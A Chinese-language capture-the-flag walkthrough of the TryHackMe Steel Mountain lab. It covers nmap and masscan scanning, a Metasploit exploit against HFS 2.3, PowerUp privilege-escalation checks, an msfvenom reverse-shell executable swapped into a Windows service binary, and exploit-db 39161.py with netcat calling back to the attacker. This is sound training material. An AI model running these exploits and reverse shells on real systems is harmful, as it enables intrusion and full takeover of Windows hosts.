tryhackme进攻性渗透测试-Advanced Exploitation 高级利用
Steel Mountain
- 偵察
 
Nmap -sC -sV -O $IP -oN basic_scan.nmap
Nmap -script=vuln $IP -oN vuln_scan.nmap
總之,masscan在eth0上工作,所以SYN端口探測技術(shù)全部沒有響應(yīng)包
需要一個(gè)flag把探測流量正確的打入tun0中masscan -p8080 10.10.205.233 -e tun0
nmap除了使用SYN端口探測之外,還使用協(xié)議"敲門"技術(shù):它知道往8080端口嘗試發(fā)送HTTP協(xié)議的請求格式,再提取響應(yīng)進(jìn)一步處理。
總之nmap知道把流量發(fā)給tun0,所以一切的端口探測技術(shù)或協(xié)議“敲門”技術(shù)都有一個(gè)正確的回應(yīng)。
- 立足點(diǎn)
 
HFS 2.3 軟件版本號 歷史漏洞一把梭
use exploit/windows/http/rejetto_hfs_exec
set rhosts <target ip>
set rport 8080 
set lhost tun0
exploit
- 錯(cuò)誤配置之PowerUp提權(quán)
 
https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1
PowerUp 的 powershell 腳本,評估 Windows的錯(cuò)誤配置來提權(quán)
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1upload ./PowerUp.ps1
PS 下的wgetPS> wget http://tun0 ip:port/PowerUp.ps1 -OutFile PowerUp.Ps1
切換到PS shell
load powershellpowershell_shell
PS > . .\PowerUp.ps1
PS > Invoke-AllChecks
制作payloadmsfvenom -p windows/shell_reverse_tcp lhost=tun0 lport=4443 -f exe -o Advanced.exe
meterpreter> background
msf6 exploit(windows/http/rejetto_hfs_exec)> use exploit/multi/handler
msf6 exploit(multi/handler) > set lhost tun0
msf6 exploit(multi/handler) > set lport 4443
msf6 exploit(multi/handler) > exploit -j
msf6 exploit(multi/handler) > sessions
msf6 exploit(multi/handler) > sessions -i 3
cd "C:/Program Files (x86)\IObit"upload Advanced.exe
cmd 的shell
shell
sc stop AdvancedSystemCareService9
copy Advanced.exe "Advanced SystemCare"
sc start AdvancedSystemCareService9
使用提權(quán)到system的shell進(jìn)入桌面拿root.txt
cd "C:\Users\Administrator\Desktop"
type root.txt
- 不依賴msf的shell,exp py腳本打點(diǎn)
nc
https://github.com/andrew-d/static-binaries/blob/master/binaries/windows/x86/ncat.exe 
searchsploit rejetto
searchsploit -x 39161.py
第 1 階段:該漏洞將在本地計(jì)算機(jī)文件系統(tǒng)中查找 nc.exe 文件并將其上傳到目標(biāo)計(jì)算機(jī)。
第 2 階段:該漏洞將在目標(biāo)服務(wù)器上執(zhí)行 nc.exe,強(qiáng)制其連接到我們的本地主機(jī)。
cp /usr/share/exploitdb/exploits/windows/remote/39161.py ./39161.py
nc -lnvp 5555
python -m http.server 80
python2 39161.py 10.10.205.233 8080
                            總結(jié)
以上是生活随笔為你收集整理的tryhackme进攻性渗透测试-Advanced Exploitation 高级利用的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
                            
                        - 上一篇: 奇味鸡煲的做法
 - 下一篇: 要提高排名,SEO路径优化也是必不可少的